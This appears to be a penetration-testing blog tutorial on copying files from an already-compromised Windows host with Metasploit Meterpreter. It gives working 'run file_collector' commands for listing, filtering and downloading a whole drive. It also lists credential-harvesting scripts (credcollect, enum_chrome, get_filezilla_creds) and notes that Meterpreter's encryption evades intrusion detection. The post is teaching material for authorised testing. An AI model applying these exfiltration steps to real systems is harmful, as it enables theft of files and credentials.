Post-exploitation: Downloading files from a victim with Metasploit Meterpreter scripts

Imagine you have compromised a target system as part of a Penetration test. Additionally, as part of the pen-test you need to download some files, both as proof of the compromise, and also to use the collected data from this system to assist in further exploitation of other systems.

Here I discuss options for how files can be downloaded using the Metasploit Meterpreter console, and using Meterpreter scripts to speed up the process.

I must emphasize that these techniques should only be used for legitimate purposes, either on a test network, or for penetration testing where you have written permission from the data owner.

You are heir to your actions, make sure that everything you do is ethical, and use these techniques for good purposes.

We will skip the exploitation phase in these examples, to focus on the post-exploitation and data collection aspects.

So, we have exploited a system, and find ourselves at friendly Meterpreter console prompt.

The Meterpreter shell has a lot of neat features, including encryption of all the traffic between our attacking system and target. This prevents any interception and scanning of the data from intrusion detection systems (IDS).

Downloading individual files:

From the Meterpreter console it is possible to download individual files using the "download" command. Which is pretty straightforward and easy if you only want to download one file.

Meterpreter has a lot of useful inbuilt scripts to make post exploitation tasks such as data collection easier. To view the options, simply type "run" and then space-tab-tab to see the auto-completion options:

Let's look at "run file_collector" first:

In the example below, I wanted to copy all the data from the E: drive of a Windows target, with the exception of a couple of directories that I am not interested in.
(In this actual example I am copying some files from a "Teach yourself C for Linux in 21 days" CD which is in the drive on the target system, onto my attacking system ;o)

To view the "run file_collector" options, use "-h"

meterpreter > run file_collector -h
Meterpreter Script for searching and downloading files that
match a specific pattern. First save files to a file, edit and
use that same file to download the choosen files.

OPTIONS:

    -d   Directory to start search on, search will be recursive.
    -f   Search blobs separated by a |.
    -h        Help menu.
    -i   Input file with list of files to download, one per line.
    -l   Location where to save the files.
    -o   Output File to save the full path of files found.
    -r        Search subdirectories.


meterpreter >

As you can see in the description, this is a three stage process. First, we create a file list, then we remove any files we don't want from the list, then we execute the download process.

Creating the file list

run file_collector -r -d e:\\ -f * -o /root/Courses/CforLinux/file.txt

We are running the collector recursively, looking for all files on the E: drive, and storing a list of these files in a "file.txt" file on my attacking system.

As Meterpreter copies files over an encrypted connection, this can make the data transfer slower, so best to strip out any unneeded files.





Editing the file list

I don't need some of the directories on the target data drive, so I use grep to remove these, and make a new file "file.lst".

cat /root/Courses/CforLinux/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst2

(I am removing the \DDD \GCC \GDB \MAKE directories, which is not particularly relevant to you, just an example. I am chopping two carrots with one knife here, as this was useful to me at the time ;o)



Downloading the file list

Once we have the edited file list we can simply start the file download process with the following command:

run file_collector -i /root/Courses/CforLinux/file.lst -l /root/Courses/CforLinux/
 

There we go, and that was a very quick way to download all the files I needed.

Other scripts for data collection

There are a whole host of data collection scripts that you can try, including the following:

scraper, credcollect, get_filezilla_creds, dumplinks, get_pidgin_creds, enum_chrome, enum_firefox, enum_putty, winenum

...and if you are feeling adventurous you could create your own scripts. (Maybe a blog for another time)

Mitigations

• There aren't really any mitigations for these examples. If the exploitation has got this far, it is basically game-over.
• Deploying a layered security program, using "Defense in depth" can reduce the risk of the initial exploitation.